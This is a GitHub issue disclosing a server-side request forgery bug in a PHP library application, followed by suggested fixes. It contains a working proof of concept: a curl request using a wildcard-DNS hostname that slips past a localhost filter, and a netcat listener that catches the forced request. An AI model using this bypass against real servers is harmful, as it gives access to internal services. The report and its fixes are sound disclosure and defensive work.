This repository has been archived by the owner on Jan 27, 2023. It is now read-only.

SSRF vulnerability #120

Closed
sn00pyd0g3 opened this issue Mar 15, 2018 · 4 comments

@sn00pyd0g3

if ($host === 'localhost'

The filter can be bypassed by wildcard DNS.
e.g. xip.io

POC:

[sn00py.B0x] ➤ curl --request POST 'http://127.0.0.1/librarian/ajaxsupplement.php' --cookie 'PHPSESSID=khjhfcm85jtsfmk54vqij2dd30' --data 'form_new_file_link=http://127.0.0.1.xip.io:1337/ssrf&filename=shell.pdf'
[sn00py.B0x] ➤ nc -l 1337
GET /ssrf HTTP/1.1
Host: 127.0.0.1.xip.io:1337
User-Agent: curl/7.50.3
Accept: */*
@mkucej
Owner

mkucej commented Mar 15, 2018

Thanks. Unfortunately, the PHP filter does not seem to be very useful for this purpose. Any idea how to fix this?

@mkucej mkucej self-assigned this Mar 15, 2018
@mkucej mkucej added the bug label Mar 15, 2018
@sn00pyd0g3
Author

That's my personal advice.

<?php
function is_safe_url($url) {
    // Allow only http(s)
    if (!preg_match('/^https?:\/\/.*$/', $url)) {
        return false;
    }

    $host = parse_url($url, PHP_URL_HOST);
    if (!$host) {
        return false;
    }

    // Resolve the name and check the address it points to, not the hostname text.
    // gethostbyname() returns the name unchanged on failure, so ip2long() then yields false.
    $ip = gethostbyname($host);
    $ip = ip2long($ip);
    if ($ip === false) {
        return false;
    }

    // Reject loopback and the RFC 1918 ranges. Use `||`, not `or`: `or` binds
    // looser than `=`, so only the first comparison would be stored.
    $is_inner_ipaddress = (ip2long('127.0.0.0') >> 24 == $ip >> 24) ||
        (ip2long('10.0.0.0') >> 24 == $ip >> 24) ||
        (ip2long('172.16.0.0') >> 20 == $ip >> 20) ||
        (ip2long('192.168.0.0') >> 16 == $ip >> 16);
    if ($is_inner_ipaddress) {
        return false;
    }
    return true;
}

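The report above shows why comparing the hostname string is not enough, and the proposed fix checks the resolved address instead. The following Python illustration (added here; not the project's code or the reporter's) contrasts the two checks against a constructed, offline resolver (FAKE_DNS, resolve, hostname_string_check and vet_url are all invented names) and goes a little beyond the posted PHP: it uses the standard library's notion of a global address, so link-local, CGNAT and IPv6 loopback are rejected too, and it rejects a name when any of its answers is internal.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for DNS (no network needed). A wildcard service such as
# xip.io answers <ip>.xip.io with that embedded <ip>, which is what the report uses.
FAKE_DNS = {
    "127.0.0.1.xip.io": ["127.0.0.1"],
    "10.0.0.5.xip.io": ["10.0.0.5"],
    "example.com": ["93.184.216.34"],
    "mixed.example": ["93.184.216.34", "192.168.1.10"],  # public and private answers
}

def resolve(host):
    """Toy resolver. A real one would use socket.getaddrinfo and keep every answer."""
    try:
        return [str(ipaddress.ip_address(host))]  # literal address, no lookup needed
    except ValueError:
        return FAKE_DNS.get(host, [])

def hostname_string_check(url):
    """The check the report bypasses: it only compares the hostname text."""
    host = urlsplit(url).hostname
    return host is not None and host != "localhost"

def vet_url(url, resolver=resolve):
    """Return (hostname, addresses) if every resolved address is public, else None.

    The caller should connect to one of the returned addresses rather than
    resolving the hostname again, so the address fetched is the address checked.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    addrs = resolver(parts.hostname)
    if not addrs:
        return None
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # is_global is False for loopback, RFC 1918, link-local, CGNAT, unspecified, ...
        if not ip.is_global or ip.is_multicast:
            return None
    return parts.hostname, addrs
```

Redirects from the fetched URL need the same vetting, since a public host can answer with a Location header pointing at an internal address.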
@mkucej
Owner

mkucej commented Mar 15, 2018

Thank you.

@mkucej
Owner

mkucej commented Mar 22, 2018

fixed in 4.9

@mkucej mkucej closed this as completed Mar 22, 2018